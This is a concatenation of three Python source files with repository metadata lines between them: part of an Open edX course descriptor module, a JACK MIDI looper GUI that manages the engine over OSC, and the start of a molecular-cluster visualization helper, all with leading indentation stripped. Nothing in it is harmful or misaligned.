# An extra property is used rather than the wiki_slug/number because
# there are courses that change the number for different runs. This allows
# courses to share the same css_class across runs even if they have
# different numbers.
#
# TODO get rid of this as soon as possible or potentially build in a robust
# way to add in course-specific styling. There needs to be a discussion
# about the right way to do this, but arjun will address this ASAP. Also
# note that the courseware template needs to change when this is removed.
css_class = String(
display_name=_("CSS Class for Course Reruns"),
help=_("Allows courses to share the same css class across runs even if they have different numbers."),
scope=Scope.settings, default="",
deprecated=True
)
# TODO: This is a quick kludge to allow CS50 (and other courses) to
# specify their own discussion forums as external links by specifying a
# "discussion_link" in their policy JSON file. This should later get
# folded in with Syllabus, Course Info, and additional Custom tabs in a
# more sensible framework later.
discussion_link = String(
display_name=_("Discussion Forum External Link"),
help=_("Allows specification of an external link to replace discussion forums."),
scope=Scope.settings,
deprecated=True
)
# TODO: same as above, intended to let internal CS50 hide the progress tab
# until we get grade integration set up.
# Explicit comparison to True because we always want to return a bool.
hide_progress_tab = Boolean(
display_name=_("Hide Progress Tab"),
help=_("Allows hiding of the progress tab."),
scope=Scope.settings,
deprecated=True
)
display_organization = String(
display_name=_("Course Organization Display String"),
help=_(
"Enter the course organization that you want to appear in the courseware. This setting overrides the "
"organization that you entered when you created the course. To use the organization that you entered "
"when you created the course, enter null."
),
scope=Scope.settings
)
display_coursenumber = String(
display_name=_("Course Number Display String"),
help=_(
"Enter the course number that you want to appear in the courseware. This setting overrides the course "
"number that you entered when you created the course. To use the course number that you entered when "
"you created the course, enter null."
),
scope=Scope.settings,
default=""
)
max_student_enrollments_allowed = Integer(
display_name=_("Course Maximum Student Enrollment"),
help=_(
"Enter the maximum number of students that can enroll in the course. To allow an unlimited number of "
"students, enter null."
),
scope=Scope.settings
)
allow_public_wiki_access = Boolean(
display_name=_("Allow Public Wiki Access"),
help=_(
"Enter true or false. If true, edX users can view the course wiki even "
"if they're not enrolled in the course."
),
default=False,
scope=Scope.settings
)
invitation_only = Boolean(
display_name=_("Invitation Only"),
help=_("Whether to restrict enrollment to invitation by the course staff."),
default=False,
scope=Scope.settings
)
course_survey_name = String(
display_name=_("Pre-Course Survey Name"),
help=_("Name of SurveyForm to display as a pre-course survey to the user."),
default=None,
scope=Scope.settings,
deprecated=True
)
course_survey_required = Boolean(
display_name=_("Pre-Course Survey Required"),
help=_(
"Specify whether students must complete a survey before they can view your course content. If you "
"set this value to true, you must add a name for the survey to the Course Survey Name setting above."
),
default=False,
scope=Scope.settings,
deprecated=True
)
catalog_visibility = String(
display_name=_("Course Visibility In Catalog"),
help=_(
"Defines the access permissions for showing the course in the course catalog. This can be set to one "
"of three values: 'both' (show in catalog and allow access to about page), 'about' (only allow access "
"to about page), 'none' (do not show in catalog and do not allow access to an about page)."
),
default=CATALOG_VISIBILITY_CATALOG_AND_ABOUT,
scope=Scope.settings,
values=[
{"display_name": _("Both"), "value": CATALOG_VISIBILITY_CATALOG_AND_ABOUT},
{"display_name": _("About"), "value": CATALOG_VISIBILITY_ABOUT},
{"display_name": _("None"), "value": CATALOG_VISIBILITY_NONE}]
)
entrance_exam_enabled = Boolean(
display_name=_("Entrance Exam Enabled"),
help=_(
"Specify whether students must complete an entrance exam before they can view your course content. "
"Note, you must enable Entrance Exams for this course setting to take effect."
),
default=False,
scope=Scope.settings,
)
entrance_exam_minimum_score_pct = Float(
display_name=_("Entrance Exam Minimum Score (%)"),
help=_(
"Specify a minimum percentage score for an entrance exam before students can view your course content. "
"Note, you must enable Entrance Exams for this course setting to take effect."
),
default=65,
scope=Scope.settings,
)
entrance_exam_id = String(
display_name=_("Entrance Exam ID"),
help=_("Content module identifier (location) of entrance exam."),
default=None,
scope=Scope.settings,
)
social_sharing_url = String(
display_name=_("Social Media Sharing URL"),
help=_(
"If dashboard social sharing and custom course URLs are enabled, you can provide a URL "
"(such as the URL to a course About page) that social media sites can link to. URLs must "
"be fully qualified. For example: http://www.edx.org/course/Introduction-to-MOOCs-ITM001"
),
default=None,
scope=Scope.settings,
)
language = String(
display_name=_("Course Language"),
help=_("Specify the language of your course."),
default=None,
scope=Scope.settings
)
teams_configuration = Dict(
display_name=_("Teams Configuration"),
# Translators: please don't translate "id".
help=_(
'Specify the maximum team size and topics for teams inside the provided set of curly braces. '
'Make sure that you enclose all of the sets of topic values within a set of square brackets, '
'with a comma after the closing curly brace for each topic, and another comma after the '
'closing square brackets. '
'For example, to specify that teams should have a maximum of 5 participants and provide a list of '
'2 topics, enter the configuration in this format: {example_format}. '
'In "id" values, the only supported special characters are underscore, hyphen, and period.'
).format(
# Put the sample JSON into a format variable so that translators
# don't muck with it.
example_format=(
'{"topics": [{"name": "Topic1Name", "description": "Topic1Description", "id": "Topic1ID"}, '
'{"name": "Topic2Name", "description": "Topic2Description", "id": "Topic2ID"}], "max_team_size": 5}'
),
),
scope=Scope.settings,
)
enable_proctored_exams = Boolean(
display_name=_("Enable Proctored Exams"),
help=_(
"Enter true or false. If this value is true, proctored exams are enabled in your course. "
"Note that enabling proctored exams will also enable timed exams."
),
default=False,
scope=Scope.settings
)
enable_timed_exams = Boolean(
display_name=_("Enable Timed Exams"),
help=_(
"Enter true or false. If this value is true, timed exams are enabled in your course."
),
default=False,
scope=Scope.settings
)
minimum_grade_credit = Float(
display_name=_("Minimum Grade for Credit"),
help=_(
"The minimum grade that a learner must earn to receive credit in the course, "
"as a decimal between 0.0 and 1.0. For example, for 75%, enter 0.75."
),
default=0.8,
scope=Scope.settings,
)
self_paced = Boolean(
display_name=_("Self Paced"),
help=_(
"Set this to \"true\" to mark this course as self-paced. Self-paced courses do not have "
"due dates for assignments, and students can progress through the course at any rate before "
"the course ends."
),
default=False,
scope=Scope.settings
)
enable_subsection_gating = Boolean(
display_name=_("Enable Subsection Prerequisites"),
help=_(
"Enter true or false. If this value is true, you can hide a "
"subsection until learners earn a minimum score in another, "
"prerequisite subsection."
),
default=False,
scope=Scope.settings
)
class CourseModule(CourseFields, SequenceModule): # pylint: disable=abstract-method
"""
The CourseDescriptor needs its module_class to be a SequenceModule, but some code that
expects a CourseDescriptor to have all its fields can fail if it gets a SequenceModule instead.
This class is to make sure that all the fields are present in all cases.
"""
class CourseDescriptor(CourseFields, SequenceDescriptor, LicenseMixin):
"""
The descriptor for the course XModule
"""
module_class = CourseModule
def __init__(self, *args, **kwargs):
"""
Expects the same arguments as XModuleDescriptor.__init__
"""
super(CourseDescriptor, self).__init__(*args, **kwargs)
_ = self.runtime.service(self, "i18n").ugettext
self._gating_prerequisites = None
if self.wiki_slug is None:
self.wiki_slug = self.location.course
if self.due_date_display_format is None and self.show_timezone is False:
# For existing courses with show_timezone set to False (and no due_date_display_format specified),
# set the due_date_display_format to what would have been shown previously (with no timezone).
# Then remove show_timezone so that if the user clears out the due_date_display_format,
# they get the default date display.
self.due_date_display_format = "DATE_TIME"
del self.show_timezone
# NOTE: relies on the modulestore to call set_grading_policy() right after
# init. (Modulestore is in charge of figuring out where to load the policy from)
# NOTE (THK): This is a last-minute addition for Fall 2012 launch to dynamically
# disable the syllabus content for courses that do not provide a syllabus
if self.system.resources_fs is None:
self.syllabus_present = False
else:
self.syllabus_present = self.system.resources_fs.exists(path('syllabus'))
self._grading_policy = {}
self.set_grading_policy(self.grading_policy)
if self.discussion_topics == {}:
self.discussion_topics = {_('General'): {'id': self.location.html_id()}}
try:
if not getattr(self, "tabs", []):
CourseTabList.initialize_default(self)
except InvalidTabsException as err:
raise type(err)('{msg} For course: {course_id}'.format(msg=err.message, course_id=unicode(self.id)))
def set_grading_policy(self, course_policy):
"""
The JSON object can have the keys GRADER and GRADE_CUTOFFS. If either is
missing, it reverts to the default.
"""
if course_policy is None:
course_policy = {}
# Load the global settings as a dictionary
grading_policy = self.grading_policy
# BOY DO I HATE THIS grading_policy CODE ACROBATICS YET HERE I ADD MORE (dhm)--this fixes things persisted w/
# defective grading policy values (but not None)
if 'GRADER' not in grading_policy:
grading_policy['GRADER'] = CourseFields.grading_policy.default['GRADER']
if 'GRADE_CUTOFFS' not in grading_policy:
grading_policy['GRADE_CUTOFFS'] = CourseFields.grading_policy.default['GRADE_CUTOFFS']
# Override any global settings with the course settings
grading_policy.update(course_policy)
# Here is where we should parse any configurations, so that we can fail early
# Use setters so that side effecting to .definitions works
self.raw_grader = grading_policy['GRADER'] # used for cms access
self.grade_cutoffs = grading_policy['GRADE_CUTOFFS']
@classmethod
def read_grading_policy(cls, paths, system):
"""Load a grading policy from the specified paths, in order, if it exists."""
# Default to a blank policy dict
policy_str = '{}'
for policy_path in paths:
if not system.resources_fs.exists(policy_path):
continue
log.debug("Loading grading policy from {0}".format(policy_path))
try:
with system.resources_fs.open(policy_path) as grading_policy_file:
policy_str = grading_policy_file.read()
# if we successfully read the file, stop looking at backups
break
except IOError:
msg = "Unable to load course settings file from '{0}'".format(policy_path)
log.warning(msg)
return policy_str
@classmethod
def from_xml(cls, xml_data, system, id_generator):
instance = super(CourseDescriptor, cls).from_xml(xml_data, system, id_generator)
# bleh, have to parse the XML here to just pull out the url_name attribute
# I don't think it's stored anywhere in the instance.
course_file = StringIO(xml_data.encode('ascii', 'ignore'))
xml_obj = etree.parse(course_file, parser=edx_xml_parser).getroot()
policy_dir = None
url_name = xml_obj.get('url_name', xml_obj.get('slug'))
if url_name:
policy_dir = 'policies/' + url_name
# Try to load grading policy
paths = ['grading_policy.json']
if policy_dir:
paths = [policy_dir + '/grading_policy.json'] + paths
try:
policy = json.loads(cls.read_grading_policy(paths, system))
except ValueError:
system.error_tracker("Unable to decode grading policy as json")
policy = {}
# now set the current instance. set_grading_policy() will apply some inheritance rules
instance.set_grading_policy(policy)
return instance
@classmethod
def definition_from_xml(cls, xml_object, system):
textbooks = []
for textbook in xml_object.findall("textbook"):
textbooks.append((textbook.get('title'), textbook.get('book_url')))
xml_object.remove(textbook)
# Load the wiki tag if it exists
wiki_slug = None
wiki_tag = xml_object.find("wiki")
if wiki_tag is not None:
wiki_slug = wiki_tag.attrib.get("slug", default=None)
xml_object.remove(wiki_tag)
definition, children = super(CourseDescriptor, cls).definition_from_xml(xml_object, system)
definition['textbooks'] = textbooks
definition['wiki_slug'] = wiki_slug
# load license if it exists
definition = LicenseMixin.parse_license_from_xml(definition, xml_object)
return definition, children
def definition_to_xml(self, resource_fs):
xml_object = super(CourseDescriptor, self).definition_to_xml(resource_fs)
if len(self.textbooks) > 0:
textbook_xml_object = etree.Element('textbook')
for textbook in self.textbooks:
textbook_xml_object.set('title', textbook.title)
textbook_xml_object.set('book_url', textbook.book_url)
xml_object.append(textbook_xml_object)
if self.wiki_slug is not None:
wiki_xml_object = etree.Element('wiki')
wiki_xml_object.set('slug', self.wiki_slug)
xml_object.append(wiki_xml_object)
# handle license specifically. Default the course to have a license
# of "All Rights Reserved", if a license is not explicitly set.
self.add_license_to_xml(xml_object, default="all-rights-reserved")
return xml_object
def has_ended(self):
"""
Returns True if the current time is after the specified course end date.
Returns False if there is no end date specified.
"""
return course_metadata_utils.has_course_ended(self.end)
def may_certify(self):
"""
Return whether it is acceptable to show the student a certificate download link.
"""
return course_metadata_utils.may_certify_for_course(
self.certificates_display_behavior,
self.certificates_show_before_end,
self.has_ended()
)
def has_started(self):
return course_metadata_utils.has_course_started(self.start)
@property
def grader(self):
return grader_from_conf(self.raw_grader)
@property
def raw_grader(self):
# force the caching of the xblock value so that it can detect the change
# pylint: disable=pointless-statement
self.grading_policy['GRADER']
return self._grading_policy['RAW_GRADER']
@raw_grader.setter
def raw_grader(self, value):
# NOTE WELL: this change will not update the processed graders. If we need that, this needs to call grader_from_conf
self._grading_policy['RAW_GRADER'] = value
self.grading_policy['GRADER'] = value
@property
def grade_cutoffs(self):
return self._grading_policy['GRADE_CUTOFFS']
@grade_cutoffs.setter
def grade_cutoffs(self, value):
self._grading_policy['GRADE_CUTOFFS'] = value
# XBlock fields don't update after mutation
policy = self.grading_policy
policy['GRADE_CUTOFFS'] = value
self.grading_policy = policy
@property
def lowest_passing_grade(self):
return min(self._grading_policy['GRADE_CUTOFFS'].values())
@property
def is_cohorted(self):
"""
Return whether the course is cohorted.
Note: No longer used. See openedx.core.djangoapps.course_groups.models.CourseCohortSettings.
"""
config = self.cohort_config
if config is None:
return False
return bool(config.get("cohorted"))
@property
def auto_cohort(self):
"""
Return whether the course is auto-cohorted.
Note: No longer used. See openedx.core.djangoapps.course_groups.models.CourseCohortSettings.
"""
if not self.is_cohorted:
return False
return bool(self.cohort_config.get(
"auto_cohort", False))
@property
def auto_cohort_groups(self):
"""
Return the list of groups to put students into. Returns [] if not
specified. Returns specified list even if is_cohorted and/or auto_cohort are
false.
Note: No longer used. See openedx.core.djangoapps.course_groups.models.CourseCohortSettings.
"""
if self.cohort_config is None:
return []
else:
return self.cohort_config.get("auto_cohort_groups", [])
@property
def top_level_discussion_topic_ids(self):
"""
Return list of topic ids defined in course policy.
"""
topics = self.discussion_topics
return [d["id"] for d in topics.values()]
@property
def cohorted_discussions(self):
"""
Return the set of discussions that is explicitly cohorted. It may be
the empty set. Note that all inline discussions are automatically
cohorted based on the course's is_cohorted setting.
Note: No longer used. See openedx.core.djangoapps.course_groups.models.CourseCohortSettings.
"""
config = self.cohort_config
if config is None:
return set()
return set(config.get("cohorted_discussions", []))
@property
def always_cohort_inline_discussions(self):
"""
This allow to change the default behavior of inline discussions cohorting. By
setting this to False, all inline discussions are non-cohorted unless their
ids are specified in cohorted_discussions.
Note: No longer used. See openedx.core.djangoapps.course_groups.models.CourseCohortSettings.
"""
config = self.cohort_config
if config is None:
return True
return bool(config.get("always_cohort_inline_discussions", True))
@property
def is_newish(self):
"""
Returns if the course has been flagged as new. If
there is no flag, return a heuristic value considering the
announcement and the start dates.
"""
flag = self.is_new
if flag is None:
# Use a heuristic if the course has not been flagged
announcement, start, now = course_metadata_utils.sorting_dates(
self.start, self.advertised_start, self.announcement
)
if announcement and (now - announcement).days < 30:
# The course has been announced for less that month
return True
elif (now - start).days < 1:
# The course has not started yet
return True
else:
return False
elif isinstance(flag, basestring):
return flag.lower() in ['true', 'yes', 'y']
else:
return bool(flag)
@property
def sorting_score(self):
"""
Returns a tuple that can be used to sort the courses according
the how "new" they are. The "newness" score is computed using a
heuristic that takes into account the announcement and
(advertised) start dates of the course if available.
The lower the number the "newer" the course.
"""
return course_metadata_utils.sorting_score(self.start, self.advertised_start, self.announcement)
@lazy
def grading_context(self):
"""
This returns a dictionary with keys necessary for quickly grading
a student. They are used by grades.grade()
The grading context has two keys:
graded_sections - This contains the sections that are graded, as
well as all possible children modules that can affect the
grading. This allows some sections to be skipped if the student
hasn't seen any part of it.
The format is a dictionary keyed by section-type. The values are
arrays of dictionaries containing
"section_descriptor" : The section descriptor
"xmoduledescriptors" : An array of xmoduledescriptors that
could possibly be in the section, for any student
all_descriptors - This contains a list of all xmodules that can
effect grading a student. This is used to efficiently fetch
all the xmodule state for a FieldDataCache without walking
the descriptor tree again.
"""
# If this descriptor has been bound to a student, return the corresponding
# XModule. If not, just use the descriptor itself
try:
module = getattr(self, '_xmodule', None)
if not module:
module = self
except UndefinedContext:
module = self
def possibly_scored(usage_key):
"""Can this XBlock type can have a score or children?"""
return usage_key.block_type in self.block_types_affecting_grading
all_descriptors = []
graded_sections = {}
def yield_descriptor_descendents(module_descriptor):
for child in module_descriptor.get_children(usage_key_filter=possibly_scored):
yield child
for module_descriptor in yield_descriptor_descendents(child):
yield module_descriptor
for chapter in self.get_children():
for section in chapter.get_children():
if section.graded:
xmoduledescriptors = list(yield_descriptor_descendents(section))
xmoduledescriptors.append(section)
# The xmoduledescriptors included here are only the ones that have scores.
section_description = {
'section_descriptor': section,
'xmoduledescriptors': [child for child in xmoduledescriptors if child.has_score]
}
section_format = section.format if section.format is not None else ''
graded_sections[section_format] = graded_sections.get(section_format, []) + [section_description]
all_descriptors.extend(xmoduledescriptors)
all_descriptors.append(section)
return {'graded_sections': graded_sections,
'all_descriptors': all_descriptors, }
@lazy
def block_types_affecting_grading(self):
"""Return all block types that could impact grading (i.e. scored, or having children)."""
return frozenset(
cat for (cat, xblock_class) in XBlock.load_classes() if (
getattr(xblock_class, 'has_score', False) or getattr(xblock_class, 'has_children', False)
)
)
@staticmethod
def make_id(org, course, url_name):
return '/'.join([org, course, url_name])
@property
def id(self):
"""Return the course_id for this course"""
return self.location.course_key
def start_datetime_text(self, format_string="SHORT_DATE"):
"""
Returns the desired text corresponding the course's start date and time in UTC. Prefers .advertised_start,
then falls back to .start
"""
i18n = self.runtime.service(self, "i18n")
return course_metadata_utils.course_start_datetime_text(
self.start,
self.advertised_start,
format_string,
i18n.ugettext,
i18n.strftime
)
@property
def start_date_is_still_default(self):
"""
Checks if the start date set for the course is still default, i.e. .start has not been modified,
and .advertised_start has not been set.
"""
return course_metadata_utils.course_start_date_is_default(
self.start,
self.advertised_start
)
def end_datetime_text(self, format_string="SHORT_DATE"):
"""
Returns the end date or date_time for the course formatted as a string.
"""
return course_metadata_utils.course_end_datetime_text(
self.end,
format_string,
self.runtime.service(self, "i18n").strftime
)
def get_discussion_blackout_datetimes(self):
"""
Get a list of dicts with start and end fields with datetime values from
the discussion_blackouts setting
"""
date_proxy = Date()
try:
ret = [
{"start": date_proxy.from_json(start), "end": date_proxy.from_json(end)}
for start, end
in filter(None, self.discussion_blackouts)
]
for blackout in ret:
if not blackout["start"] or not blackout["end"]:
raise ValueError
return ret
except (TypeError, ValueError):
log.exception(
"Error parsing discussion_blackouts %s for course %s",
self.discussion_blackouts,
self.id
)
return []
@property
def forum_posts_allowed(self):
"""
Return whether forum posts are allowed by the discussion_blackouts
setting
"""
blackouts = self.get_discussion_blackout_datetimes()
now = datetime.now(UTC())
for blackout in blackouts:
if blackout["start"] <= now <= blackout["end"]:
return False
return True
@property
def number(self):
"""
Returns this course's number.
This is a "number" in the sense of the "course numbers" that you see at
lots of universities. For example, given a course
"Intro to Computer Science" with the course key "edX/CS-101/2014", the
course number would be "CS-101"
"""
return course_metadata_utils.number_for_course_location(self.location)
@property
def display_number_with_default(self):
"""
Return a display course number if it has been specified, otherwise return the 'course' that is in the location
"""
if self.display_coursenumber:
return self.display_coursenumber
return self.number
@property
def org(self):
return self.location.org
@property
def display_org_with_default(self):
"""
Return a display organization if it has been specified, otherwise return the 'org' that is in the location
"""
if self.display_organization:
return self.display_organization
return self.org
@property
def video_pipeline_configured(self):
"""
Returns whether the video pipeline advanced setting is configured for this course.
"""
return (
self.video_upload_pipeline is not None and
'course_video_upload_token' in self.video_upload_pipeline
)
def clean_id(self, padding_char='='):
"""
Returns a unique deterministic base32-encoded ID for the course.
The optional padding_char parameter allows you to override the "=" character used for padding.
"""
return course_metadata_utils.clean_course_key(self.location.course_key, padding_char)
@property
def teams_enabled(self):
"""
Returns whether or not teams has been enabled for this course.
Currently, teams are considered enabled when at least one topic has been configured for the course.
"""
if self.teams_configuration:
return len(self.teams_configuration.get('topics', [])) > 0
return False
@property
def teams_max_size(self):
"""
Returns the max size for teams if teams has been configured, else None.
"""
return self.teams_configuration.get('max_team_size', None)
@property
def teams_topics(self):
"""
Returns the topics that have been configured for teams for this course, else None.
"""
return self.teams_configuration.get('topics', None)
def get_user_partitions_for_scheme(self, scheme):
"""
Retrieve all user partitions defined in the course for a particular
partition scheme.
Arguments:
scheme (object): The user partition scheme.
Returns:
list of `UserPartition`
"""
return [
p for p in self.user_partitions
if p.scheme == scheme
]
def set_user_partitions_for_scheme(self, partitions, scheme):
"""
Set the user partitions for a particular scheme.
Preserves partitions associated with other schemes.
Arguments:
scheme (object): The user partition scheme.
Returns:
list of `UserPartition`
"""
other_partitions = [
p for p in self.user_partitions # pylint: disable=access-member-before-definition
if p.scheme != scheme
]
self.user_partitions = other_partitions + partitions # pylint: disable=attribute-defined-outside-init
@property
def can_toggle_course_pacing(self):
"""
Whether or not the course can be set to self-paced at this time.
Returns:
bool: False if the course has already started, True otherwise.
"""
return datetime.now(UTC()) <= self.start
class CourseSummary(object):
"""
A lightweight course summary class, which constructs split/mongo course summary without loading
the course. It is used at cms for listing courses to global staff user.
"""
course_info_fields = ['display_name', 'display_coursenumber', 'display_organization']
def __init__(self, course_locator, display_name=u"Empty", display_coursenumber=None, display_organization=None):
"""
Initialize and construct course summary
Arguments:
course_locator (CourseLocator): CourseLocator object of the course.
display_name (unicode): display name of the course. When you create a course from console, display_name
isn't set (course block has no key `display_name`). "Empty" name is returned when we load the course.
If `display_name` isn't present in the course block, use the `Empty` as default display name.
We can set None as a display_name in Course Advance Settings; Do not use "Empty" when display_name is
set to None.
display_coursenumber (unicode|None): Course number that is specified & appears in the courseware
display_organization (unicode|None): Course organization that is specified & appears in the courseware
"""
self.display_coursenumber = display_coursenumber
self.display_organization = display_organization
self.display_name = display_name
self.id = course_locator # pylint: disable=invalid-name
self.location = course_locator.make_usage_key('course', 'course')
@property
def display_org_with_default(self):
"""
Return a display organization if it has been specified, otherwise return the 'org' that
is in the location
"""
if self.display_organization:
return self.display_organization
return self.location.org
@property
def display_number_with_default(self):
"""
Return a display course number if it has been specified, otherwise return the 'course' that
is in the location
"""
if self.display_coursenumber:
return self.display_coursenumber
return self.location.course
| agpl-3.0 | 1,317,115,201,239,316,500 | 38.201797 | 124 | 0.613874 | false |
jtotto/sooper-jack-midi-looper | src/GUI/jack_midi_looper_gui/engine_manager.py | 1 | 10951 | # JACK MIDI LOOPER
# Copyright (C) 2014 Joshua Otto
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import liblo
import logging
from jack_midi_looper_gui.models import MIDIMappingInfo
from jack_midi_looper_gui.subject import Subject
import subprocess
import threading
import time
class IEngineManager( Subject ):
"""Interface for the engine manager."""
def __init__( self ):
"""Constructs an engine manager with the given subscription keys."""
Subject.__init__( self )
self.add_key( "loops" )
self.add_key( "mappings" )
self.add_key( "shutdown" )
@staticmethod
def perform_notify( key, callback, data ):
"""
Implement the Subject's notify functionality.
There is NO guarantee that the provided callbacks will be invoked from the
same thread, so they should be written accordingly.
"""
if key == "shutdown":
callback()
else: # "loops", "mappings"
change_type, change_content = data
callback( change_type, change_content )
def initialize_subscribers( self ):
"""Retrieve the initial state of the engine."""
raise NotImplementedError
def cleanup( self ):
"""Wrap up interaction with the engine."""
raise NotImplementedError
def new_loop( self, name ):
"""
Requests that the engine create a new loop.
Args:
name (str): A string containing the name of the loop to be created.
Returns:
void
"""
raise NotImplementedError
def remove_loops( self, names ):
"""
Requests that the engine remove the given loops.
Args:
names (list[str]): A list of string names of loops to be removed.
Returns:
void
"""
raise NotImplementedError
def new_mapping( self, mapping_info ):
"""
Requests that the engine create a new MIDI mapping with the given
characterstics.
Args:
mapping_info (MIDIMappingInfo): A MIDIMappingInfo object for the engine to create.
Returns:
void
"""
raise NotImplementedError
def remove_mappings( self, mapping_infos ):
"""
Requests that the engine remove all of the specified MIDI mappings.
Args:
mapping_infos (list[MIDIMappingInfo]): A list of MIDIMappingInfo objects
to be removed.
Returns:
void
"""
raise NotImplementedError
def IEngineManagerFactory( engine_port, engine_host, our_port, fail_on_not_found,
quit_on_shutdown ):
"""Simply construct an appropriate IEngineManager."""
return EngineManager( engine_port, engine_host, our_port, fail_on_not_found,
quit_on_shutdown )
class EngineManager( IEngineManager ):
"""Default implementation of engine management using OSC."""
def __init__( self, engine_port, engine_host, our_port, fail_on_not_found,
quit_on_shutdown ):
"""
Initialize by establishing communication with an existing engine, or
spawning a new one if required.
Args:
loop_change_handler ((void)(str,str)): The callback to invoke when
notified by the engine.
mapping_change_handler ((void)(str,str)): The callback to invoke.
engine_port (int): The port on which to communicate with the engine
engine_host (str): The host on which to look for the engine.
our_port (int): The port on which our OSC server communicates.
fail_on_not_found (bool): Determines whether or not we should attempt to
spawn an engine instance in the case that the given one does not
respond.
"""
IEngineManager.__init__( self )
self._quit_on_shutdown = quit_on_shutdown
try:
if our_port is None:
self._server_thread = liblo.ServerThread()
else:
self._server_thread = liblo.ServerThread( our_port )
except liblo.ServerError:
print( "Problem setting up OSC!" )
raise
self._server_thread.add_method( "/pingack", "ssi", self._pingack_callback )
self._server_thread.add_method(
"/loop/update", "ss", self._loop_change_callback )
self._server_thread.add_method(
"/mapping/update", "ss", self._mapping_change_callback )
self._server_thread.add_method(
"/shutdown", "ss", self._shutdown_callback )
self._server_thread.start()
print( "GUI OSC Server at {0}".format( self._server_thread.get_url() ) )
self._received_pingack = False
self._pingack_lock = threading.Lock()
self._engine_address = liblo.Address( engine_host, engine_port )
liblo.send(
self._engine_address, "/ping", self._server_thread.get_url(), "/pingack" )
# Wait for the pingack.
time.sleep( 0.7 )
self._pingack_lock.acquire()
received = self._received_pingack
self._pingack_lock.release()
if not received:
if fail_on_not_found:
# TODO: something a little friendlier
raise EngineManager.NoEngineError
subprocess.Popen( ["jack_midi_looper", "-p", str( engine_port )] )
self._engine_address = liblo.Address( "localhost", engine_port )
time.sleep( 0.3 ) # Maybe a bit hacky...
liblo.send( self._engine_address, "/ping", self._server_thread.get_url(),
"/pingack" )
time.sleep( 0.7 )
self._pingack_lock.acquire()
if not self._received_pingack:
raise EngineManager.NoEngineError
self._pingack_lock.release()
class NoEngineError( Exception ):
pass
def initialize_subscribers( self ):
"""
Requests that the engine send us update information necessary to bring us up
to its current state.
"""
liblo.send( self._engine_address, "/loop_list",
self._server_thread.get_url(), "/loop/update" )
liblo.send( self._engine_address, "/midi_binding_list",
self._server_thread.get_url(), "/mapping/update" )
liblo.send( self._engine_address, "/register_auto_update", "loops",
self._server_thread.get_url(), "/loop/update" )
liblo.send( self._engine_address, "/register_auto_update", "mappings",
self._server_thread.get_url(), "/mapping/update" )
liblo.send( self._engine_address, "/register_auto_update", "shutdown",
self._server_thread.get_url(), "/shutdown" )
def cleanup( self ):
"""
Conclude interaction with the engine by unsubscribing and potentially
quitting.
"""
if self._quit_on_shutdown:
liblo.send( self._engine_address, "/quit" )
else:
liblo.send( self._engine_address, "/unregister_auto_update", "loops",
self._server_thread.get_url(), "/loop/update" )
liblo.send( self._engine_address, "/unregister_auto_update", "mappings",
self._server_thread.get_url(), "/mapping/update" )
def _pingack_callback( self, path, args ):
host_url, version, loopcount = args
print( "Received pingack from engine on host {0} running version {1}."
.format( host_url, version ) )
print( "The engine currently has {0} loops.".format( loopcount ) )
self._pingack_lock.acquire()
self._received_pingack = True
self._pingack_lock.release()
def _shutdown_callback( self, path, args ):
self.notify( "shutdown", args )
def _loop_change_callback( self, path, args ):
logging.info( "loop change callback" )
for arg in args:
logging.info( " %s", arg )
self.notify( "loops", args )
type_serializations = {
"Note On":"on",
"Note Off":"off",
"CC On":"cc_on",
"CC Off":"cc_off"
}
type_deserializations = {
"on":"Note On",
"off":"Note Off",
"cc_on":"CC On",
"cc_off":"CC Off"
}
action_serializations = {
"Toggle Playback":"toggle_playback",
"Toggle Recording":"toggle_recording"
}
action_deserializations = {
"toggle_playback":"Toggle Playback",
"toggle_recording":"Toggle Recording"
}
@staticmethod
def _serialize_mapping( mapping_info ):
return "{0} {1} {2} {3} {4}".format( mapping_info.channel,
EngineManager.type_serializations[mapping_info.midi_type], mapping_info.value,
EngineManager.action_serializations[mapping_info.loop_action], mapping_info.loop_name )
@staticmethod
def _deserialize_mapping( mapping_serialization ):
data = mapping_serialization.split( " " )
channel = int( data[0] )
midi_type = EngineManager.type_deserializations[data[1]]
value = int( data[2] )
loop_action = EngineManager.action_deserializations[data[3]]
loop_name = data[4]
return MIDIMappingInfo( channel, midi_type, value, loop_name, loop_action )
def _mapping_change_callback( self, path, args ):
logging.info( "mapping change callback" )
for arg in args:
logging.info( " %s", arg )
change, serialization = args
deserialized = ( change, self._deserialize_mapping( serialization ) )
self.notify( "mappings", deserialized )
def new_loop( self, name ):
liblo.send( self._engine_address, "/loop_add", name )
def remove_loops( self, names ):
for name in names:
liblo.send( self._engine_address, "/loop_del", name )
def new_mapping( self, mapping_info ):
serialization = self._serialize_mapping( mapping_info )
liblo.send( self._engine_address, "/add_midi_binding", serialization )
def remove_mappings( self, mapping_infos ):
for info in mapping_infos:
serialization = self._serialize_mapping( info )
liblo.send( self._engine_address, "/remove_midi_binding", serialization )
| gpl-2.0 | -1,342,625,881,783,382,500 | 35.748322 | 99 | 0.601863 | false |
ramansbach/cluster_analysis | clustering/visualize.py | 1 | 2797 | from __future__ import absolute_import, division, print_function
import numpy as np
import gsd.hoomd
import sklearn
import scipy.optimize as opt
import os
import pdb
from sklearn.neighbors import BallTree
from sklearn.neighbors import radius_neighbors_graph
from scipy.spatial.distance import cdist
from scipy.special import erf
from scipy.sparse.csgraph import connected_components
#from .due import due, Doi
from .smoluchowski import massAvSize
#from mpi4py import MPI
from cdistances import conOptDistanceCython,alignDistancesCython
__all__ = ['writeFrameForVMD','writeFramesFromCIDFile']
def writeFrameForVMD(clusterIDs,molno,atomno,frameout):
""" Function that writes out a single frame for coloring by cluster
Parameters
----------
clusterIDs: list of ints for the frame corresponding to each molecule's
cluster index
molno: int
number of molecules in frame
atomno: int
number of atoms per molecule
frameout: string
name of output file
Notes
-----
Format of output file has a line for each cluster consisting of a set
of ints. The first int is the colorID, and the rest are the atom indices
that should be set to that color. By assumption, there are 16 available
different colors.
First line of file contains the total number of subsequent lines
(# of clusters)
"""
framefile = open(frameout,'w')
ind = 0
framefile.write('{0}\n'.format(max(clusterIDs)+1))
for cID in range(max(clusterIDs)+1):
#pdb.set_trace()
line = ''
